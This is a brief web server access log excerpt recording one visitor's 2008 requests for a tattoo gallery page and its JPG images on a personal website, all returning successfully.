204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
204.246.125.62 - - [21/Jun/2008:23:48:01 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0"
